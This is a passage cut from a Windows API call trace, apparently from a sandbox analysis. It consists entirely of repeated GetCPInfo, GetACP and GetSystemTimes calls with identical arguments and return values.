lpCPInfo=0x18fa10) returned 1 [0076.857] GetACP () returned 0x4e4 [0076.857] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.857] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.857] GetACP () returned 0x4e4 [0076.857] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.858] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.858] GetACP () returned 0x4e4 [0076.858] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.858] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.858] GetACP () returned 0x4e4 [0076.858] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.858] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.858] GetACP () returned 0x4e4 [0076.858] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.858] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.859] GetACP () returned 0x4e4 [0076.859] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.859] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.859] GetACP () returned 0x4e4 [0076.859] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.859] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.859] GetACP () returned 0x4e4 [0076.859] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.859] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.859] GetACP () returned 0x4e4 [0076.859] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.860] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.860] GetACP () returned 0x4e4 [0076.860] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.860] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.860] GetACP () returned 0x4e4 [0076.860] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.860] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.860] GetACP () returned 0x4e4 [0076.860] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.861] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.861] GetACP () returned 0x4e4 [0076.861] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.861] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.861] GetACP () returned 0x4e4 [0076.861] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.861] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.861] GetACP () returned 0x4e4 [0076.861] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.861] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.862] GetACP () returned 0x4e4 [0076.862] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.862] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.862] GetACP () returned 0x4e4 [0076.862] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.862] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.862] GetACP () returned 0x4e4 [0076.862] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.862] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.862] GetACP () returned 0x4e4 [0076.862] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.862] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.862] GetACP () returned 0x4e4 [0076.862] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.863] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.863] GetACP () returned 0x4e4 [0076.863] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.863] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.863] GetACP () returned 0x4e4 [0076.863] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.863] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.863] GetACP () returned 0x4e4 [0076.863] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.863] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.863] GetACP () returned 0x4e4 [0076.864] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.864] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.864] GetACP () returned 0x4e4 [0076.864] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.864] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.864] GetACP () returned 0x4e4 [0076.864] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.864] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.864] GetACP () returned 0x4e4 [0076.864] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.865] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.865] GetACP () returned 0x4e4 [0076.865] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.865] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.865] GetACP () returned 0x4e4 [0076.865] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.865] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.866] GetACP () returned 0x4e4 [0076.866] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.866] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.866] GetACP () returned 0x4e4 [0076.866] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.866] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.866] GetACP () returned 0x4e4 [0076.866] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.866] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.866] GetACP () returned 0x4e4 [0076.867] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.867] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.867] GetACP () returned 0x4e4 [0076.867] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.867] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.867] GetACP () returned 0x4e4 [0076.867] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.867] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.867] GetACP () returned 0x4e4 [0076.867] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.867] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.868] GetACP () returned 0x4e4 [0076.868] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.868] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.868] GetACP () returned 0x4e4 [0076.868] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.868] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.868] GetACP () returned 0x4e4 [0076.868] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.868] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.868] GetACP () returned 0x4e4 [0076.868] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.869] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.869] GetACP () returned 0x4e4 [0076.869] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.869] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.869] GetACP () returned 0x4e4 [0076.870] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.870] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.870] GetACP () returned 0x4e4 [0076.870] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.870] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.870] GetACP () returned 0x4e4 [0076.870] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.870] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.870] GetACP () returned 0x4e4 [0076.870] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.871] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.871] GetACP () returned 0x4e4 [0076.871] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.871] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.871] GetACP () returned 0x4e4 [0076.871] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.871] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.871] GetACP () returned 0x4e4 [0076.871] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.871] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.871] GetACP () returned 0x4e4 [0076.871] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.872] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.872] GetACP () returned 0x4e4 [0076.872] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.872] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.872] GetACP () returned 0x4e4 [0076.872] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.872] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.872] GetACP () returned 0x4e4 [0076.872] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.872] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.873] GetACP () returned 0x4e4 [0076.873] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.873] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.873] GetACP () returned 0x4e4 [0076.873] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.873] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.873] GetACP () returned 0x4e4 [0076.873] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.873] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.873] GetACP () returned 0x4e4 [0076.874] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.874] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.874] GetACP () returned 0x4e4 [0076.874] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.874] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.874] GetACP () returned 0x4e4 [0076.874] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.874] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.874] GetACP () returned 0x4e4 [0076.874] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.874] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.875] GetACP () returned 0x4e4 [0076.875] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.875] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.875] GetACP () returned 0x4e4 [0076.875] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.875] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.875] GetACP () returned 0x4e4 [0076.875] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.875] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.875] GetACP () returned 0x4e4 [0076.875] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.875] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.875] GetACP () returned 0x4e4 [0076.875] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.876] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.876] GetACP () returned 0x4e4 [0076.876] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.876] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.876] GetACP () returned 0x4e4 [0076.876] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.876] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.876] GetACP () returned 0x4e4 [0076.876] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.876] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.876] GetACP () returned 0x4e4 [0076.876] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.876] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.876] GetACP () returned 0x4e4 [0076.877] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.877] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.877] GetACP () returned 0x4e4 [0076.877] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.877] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.877] GetACP () returned 0x4e4 [0076.877] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.877] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.877] GetACP () returned 0x4e4 [0076.877] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.877] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.878] GetACP () returned 0x4e4 [0076.878] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.878] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.878] GetACP () returned 0x4e4 [0076.878] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.878] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.878] GetACP () returned 0x4e4 [0076.878] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.878] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.878] GetACP () returned 0x4e4 [0076.878] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0076.878] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0076.878] GetACP () returned 0x4e4 [0076.878] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | 